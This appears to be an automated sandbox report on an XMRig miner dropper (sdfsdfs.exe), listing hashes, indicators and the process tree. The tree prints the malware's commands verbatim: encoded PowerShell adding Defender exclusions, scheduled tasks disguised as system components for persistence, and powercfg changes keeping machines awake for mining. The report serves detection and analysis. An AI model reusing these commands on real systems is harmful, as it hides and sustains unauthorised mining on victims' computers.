xmrig | 2194f49d4b349e23456b323abfc7167bf5927453590abd43cbdaca1dda9bcd68

Analysis

max time kernel
527s
max time network
521s
platform
windows10-2004_x64
resource
win10v2004-20230220-es
resource tags

arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
19/03/2023, 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Git2/sdfsdfs.exe
Size

214KB
MD5

8882daf740d94819afcce024bce34a37
SHA1

4bdb80e664638201f393a49e5577886683d54662
SHA256

a5ea48e864640a9562da03abdd54cfa617a4699cec0238299bdda5ccb28cfe8d
SHA512

6ba0c7863713c4334ce511ee7ea7460ea6dacdb243008fae1556a3db7740e6ae53f30e03309f3cc3bf0394328f470a880bf8ed31ee7552ef47dd3823a6ef4c97
SSDEEP

6144:O6nLK128LbhLJuLZePizkHQ3EqdYmkRMUx:DLK12gJuLZ0iIHqfG

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral8/files/0x000600000002314e-329.dat	family_xmrig
behavioral8/files/0x000600000002314e-329.dat	xmrig
behavioral8/memory/3068-333-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-334-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-336-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-337-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-339-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-340-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-341-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-342-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-343-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-344-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-345-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-346-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-347-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-348-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-349-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-350-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-351-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-352-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-353-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-354-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-355-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-357-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-358-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-359-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-360-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-361-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-362-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-363-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-364-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-365-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-366-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-367-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-368-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-369-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-370-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-371-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-372-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-373-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-374-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-375-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-376-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-377-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-378-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-379-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-380-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral8/memory/3068-381-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 3 IoCs

pid	Process
4860	dllhost.exe
3068	winlogson.exe
1528	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 924 set thread context of 2348	924	sdfsdfs.exe	84

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3848	924	WerFault.exe	82

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4348	schtasks.exe
1296	schtasks.exe
1488	schtasks.exe
2680	schtasks.exe
3440	schtasks.exe
4124	schtasks.exe
3200	schtasks.exe
628	schtasks.exe
4972	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2348	AppLaunch.exe
3500	powershell.exe
3500	powershell.exe
4976	powershell.exe
4976	powershell.exe
2208	powershell.exe
2208	powershell.exe
1372	powershell.exe
1372	powershell.exe
1900	powershell.exe
1900	powershell.exe
1224	powershell.exe
1224	powershell.exe
1900	powershell.exe
4976	powershell.exe
2208	powershell.exe
1372	powershell.exe
1224	powershell.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe
4860	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
648	Process not Found

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	2348	AppLaunch.exe
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeShutdownPrivilege	1836	powercfg.exe
Token: SeCreatePagefilePrivilege	1836	powercfg.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeShutdownPrivilege	4120	powercfg.exe
Token: SeCreatePagefilePrivilege	4120	powercfg.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeShutdownPrivilege	4448	powercfg.exe
Token: SeCreatePagefilePrivilege	4448	powercfg.exe
Token: SeShutdownPrivilege	1616	powercfg.exe
Token: SeCreatePagefilePrivilege	1616	powercfg.exe
Token: SeShutdownPrivilege	4492	powercfg.exe
Token: SeCreatePagefilePrivilege	4492	powercfg.exe
Token: SeShutdownPrivilege	4492	powercfg.exe
Token: SeCreatePagefilePrivilege	4492	powercfg.exe
Token: SeDebugPrivilege	4860	dllhost.exe
Token: SeLockMemoryPrivilege	3068	winlogson.exe
Token: SeLockMemoryPrivilege	3068	winlogson.exe
Token: SeDebugPrivilege	1528	dllhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3068	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 924 wrote to memory of 2348	924	sdfsdfs.exe	84
PID 924 wrote to memory of 2348	924	sdfsdfs.exe	84
PID 924 wrote to memory of 2348	924	sdfsdfs.exe	84
PID 924 wrote to memory of 2348	924	sdfsdfs.exe	84
PID 924 wrote to memory of 2348	924	sdfsdfs.exe	84
PID 2348 wrote to memory of 3868	2348	AppLaunch.exe	88
PID 2348 wrote to memory of 3868	2348	AppLaunch.exe	88
PID 2348 wrote to memory of 3868	2348	AppLaunch.exe	88
PID 3868 wrote to memory of 3500	3868	cmd.exe	90
PID 3868 wrote to memory of 3500	3868	cmd.exe	90
PID 3868 wrote to memory of 3500	3868	cmd.exe	90
PID 2348 wrote to memory of 4860	2348	AppLaunch.exe	94
PID 2348 wrote to memory of 4860	2348	AppLaunch.exe	94
PID 2348 wrote to memory of 4860	2348	AppLaunch.exe	94
PID 2348 wrote to memory of 1080	2348	AppLaunch.exe	95
PID 2348 wrote to memory of 1080	2348	AppLaunch.exe	95
PID 2348 wrote to memory of 1080	2348	AppLaunch.exe	95
PID 2348 wrote to memory of 3788	2348	AppLaunch.exe	122
PID 2348 wrote to memory of 3788	2348	AppLaunch.exe	122
PID 2348 wrote to memory of 3788	2348	AppLaunch.exe	122
PID 2348 wrote to memory of 1684	2348	AppLaunch.exe	121
PID 2348 wrote to memory of 1684	2348	AppLaunch.exe	121
PID 2348 wrote to memory of 1684	2348	AppLaunch.exe	121
PID 2348 wrote to memory of 4072	2348	AppLaunch.exe	120
PID 2348 wrote to memory of 4072	2348	AppLaunch.exe	120
PID 2348 wrote to memory of 4072	2348	AppLaunch.exe	120
PID 2348 wrote to memory of 2176	2348	AppLaunch.exe	119
PID 2348 wrote to memory of 2176	2348	AppLaunch.exe	119
PID 2348 wrote to memory of 2176	2348	AppLaunch.exe	119
PID 2348 wrote to memory of 2916	2348	AppLaunch.exe	118
PID 2348 wrote to memory of 2916	2348	AppLaunch.exe	118
PID 2348 wrote to memory of 2916	2348	AppLaunch.exe	118
PID 2348 wrote to memory of 2064	2348	AppLaunch.exe	117
PID 2348 wrote to memory of 2064	2348	AppLaunch.exe	117
PID 2348 wrote to memory of 2064	2348	AppLaunch.exe	117
PID 2348 wrote to memory of 4564	2348	AppLaunch.exe	116
PID 2348 wrote to memory of 4564	2348	AppLaunch.exe	116
PID 2348 wrote to memory of 4564	2348	AppLaunch.exe	116
PID 2348 wrote to memory of 1528	2348	AppLaunch.exe	115
PID 2348 wrote to memory of 1528	2348	AppLaunch.exe	115
PID 2348 wrote to memory of 1528	2348	AppLaunch.exe	115
PID 2348 wrote to memory of 4372	2348	AppLaunch.exe	114
PID 2348 wrote to memory of 4372	2348	AppLaunch.exe	114
PID 2348 wrote to memory of 4372	2348	AppLaunch.exe	114
PID 2348 wrote to memory of 2320	2348	AppLaunch.exe	113
PID 2348 wrote to memory of 2320	2348	AppLaunch.exe	113
PID 2348 wrote to memory of 2320	2348	AppLaunch.exe	113
PID 2348 wrote to memory of 2304	2348	AppLaunch.exe	96
PID 2348 wrote to memory of 2304	2348	AppLaunch.exe	96
PID 2348 wrote to memory of 2304	2348	AppLaunch.exe	96
PID 2348 wrote to memory of 3992	2348	AppLaunch.exe	112
PID 2348 wrote to memory of 3992	2348	AppLaunch.exe	112
PID 2348 wrote to memory of 3992	2348	AppLaunch.exe	112
PID 2348 wrote to memory of 4680	2348	AppLaunch.exe	103
PID 2348 wrote to memory of 4680	2348	AppLaunch.exe	103
PID 2348 wrote to memory of 4680	2348	AppLaunch.exe	103
PID 2176 wrote to memory of 4348	2176	cmd.exe	124
PID 2176 wrote to memory of 4348	2176	cmd.exe	124
PID 2176 wrote to memory of 4348	2176	cmd.exe	124
PID 4564 wrote to memory of 1488	4564	cmd.exe	129
PID 4564 wrote to memory of 1488	4564	cmd.exe	129
PID 4564 wrote to memory of 1488	4564	cmd.exe	129
PID 1080 wrote to memory of 1296	1080	cmd.exe	128
PID 1080 wrote to memory of 1296	1080	cmd.exe	128

C:\Users\Admin\AppData\Local\Temp\Git2\sdfsdfs.exe
"C:\Users\Admin\AppData\Local\Temp\Git2\sdfsdfs.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:924
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEsAaABuADYATABuAGgAUwBHAHYAdABqAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBIADEAaQBLAGsAegB2AHUAZQB0AFoAegB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMATwBtADYAagAzAEgAZQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBLAGoAWAB6AEsASgBRAEEAYQB1AHYAdgBzAGgASAAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEsAaABuADYATABuAGgAUwBHAHYAdABqAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBIADEAaQBLAGsAegB2AHUAZQB0AFoAegB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMATwBtADYAagAzAEgAZQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBLAGoAWAB6AEsASgBRAEEAYQB1AHYAdgBzAGgASAAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3500
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4860
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2664
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1296
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo X3FhДoz & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo эVЪyYБpPнЭй9XaЦ
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1296
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAE8EYgAfBGMASQBDBBIELgRNBDIEPARIACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKgRRAEEAYQAZBEoESwQsBB4EIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADkEJAQ5AGgATgAjAD4AIABAACgAIAA8ACMAFQQZBEsAOAA0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwByACIEaQBPBCIEMARTAEYAHARQAFkAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEoAFwQ5BC0EcAAiBBkEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAFQQVBFcAdgAVBDQAMwRMBCAEEgRaAB0EIwA+AA=="
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAE8EYgAfBGMASQBDBBIELgRNBDIEPARIACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKgRRAEEAYQAZBEoESwQsBB4EIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADkEJAQ5AGgATgAjAD4AIABAACgAIAA8ACMAFQQZBEsAOAA0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwByACIEaQBPBCIEMARTAEYAHARQAFkAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEoAFwQ5BC0EcAAiBBkEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAFQQVBFcAdgAVBDQAMwRMBCAEEgRaAB0EIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4976
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo ПзСМфКЫUuy & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo dчRВЗгАЭКпЧРIВpА
    3⤵
    PID:4680
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1836
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4120
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4448
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1616
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4492
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAHIAegBEACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQAyBCwEPwQ+BEkAdQAzAGsAFQQ5BBUEEgQ/BE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADgEFgRUAEQEHgQeBDoEagBABFUAbQAWBCMAPgAgAEAAKAAgADwAIwBKAHMAMARIABEEaABUABoEbwByACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBDAEwEPARNBGYAJwRkAEUAbQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAMABDACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADsEZgB2AGwAFAQuBEkAdwBFACoEEwQ+BCAEIwA+AA=="
    3⤵
    PID:3992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAHIAegBEACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQAyBCwEPwQ+BEkAdQAzAGsAFQQ5BBUEEgQ/BE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADgEFgRUAEQEHgQeBDoEagBABFUAbQAWBCMAPgAgAEAAKAAgADwAIwBKAHMAMARIABEEaABUABoEbwByACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBDAEwEPARNBGYAJwRkAEUAbQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAMABDACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADsEZgB2AGwAFAQuBEkAdwBFACoEEwQ+BCAEIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADQEcABLBG0ASgB2AEYEcABOBEwEQQA2AEQAQQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABgERwAwBEEEdwAoBE8ATQATBEUEIwQ4BE8AOwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBKBD8EMABmADkEKQRZAD0ETgRBBFAAIwA+ACAAQAAoACAAPAAjAFcARAAzBGwAMQR6ADkAaABrADgEaQBpAFAAKQQTBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA6BDYAdwA3ACwEOAQ/BCQEFwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAVQBzACsEawAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA4ADcAUwAtBDcEZABNBCIEbwB1ADwELwQfBEgEUgAjAD4A"
    3⤵
    PID:2320
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADQEcABLBG0ASgB2AEYEcABOBEwEQQA2AEQAQQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABgERwAwBEEEdwAoBE8ATQATBEUEIwQ4BE8AOwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBKBD8EMABmADkEKQRZAD0ETgRBBFAAIwA+ACAAQAAoACAAPAAjAFcARAAzBGwAMQR6ADkAaABrADgEaQBpAFAAKQQTBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA6BDYAdwA3ACwEOAQ/BCQEFwQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAVQBzACsEawAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA4ADcAUwAtBDcEZABNBCIEbwB1ADwELwQfBEgEUgAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADMESARABFAAJAQkBDMEFwRrAHEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAQQQ9BCoERwRWABcEHgRDABcEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHkATwA6BBQEOABVACMEMQAjAD4AIABAACgAIAA8ACMAVQBHAGUAWgBFAEoEbAA7BFgAbgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAOAQRBBIEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEEEMARaAEYEKQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5ADUAQgRuADMAYQBQACcEaQA1AE8APARZAEUAIwA+AA=="
    3⤵
    PID:4372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADMESARABFAAJAQkBDMEFwRrAHEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAQQQ9BCoERwRWABcEHgRDABcEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHkATwA6BBQEOABVACMEMQAjAD4AIABAACgAIAA8ACMAVQBHAGUAWgBFAEoEbAA7BFgAbgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAOAQRBBIEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEEEMARaAEYEKQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5ADUAQgRuADMAYQBQACcEaQA1AE8APARZAEUAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAE8AMAAhBEcARQQxBG8AVwBVACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbwATBEcEZQBCBEAEbgBVAHoASgRSADUEOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAPgQcBBUERgRmABYEJAQ9BCUEFwRwACMAPgAgAEAAKAAgADwAIwByAHYAMwBlAE4EUwBoAGoASQA5BDgESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATgAlBHQALgRKAHgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAC0ESwA/BD8EIQQwBFEANQAhBEUEGAQQBBYEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOQQnBC0EdgAkBC4ENwBaAFcAcwBGAHgAeAAxBGsAIwA+AA=="
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAE8AMAAhBEcARQQxBG8AVwBVACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbwATBEcEZQBCBEAEbgBVAHoASgRSADUEOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAPgQcBBUERgRmABYEJAQ9BCUEFwRwACMAPgAgAEAAKAAgADwAIwByAHYAMwBlAE4EUwBoAGoASQA5BDgESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATgAlBHQALgRKAHgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAC0ESwA/BD8EIQQwBFEANQAhBEUEGAQQBBYEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOQQnBC0EdgAkBC4ENwBaAFcAcwBGAHgAeAAxBGsAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo UбмS3xl2cКВб1ВWK & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo рdСЧеzА
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4564
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1488
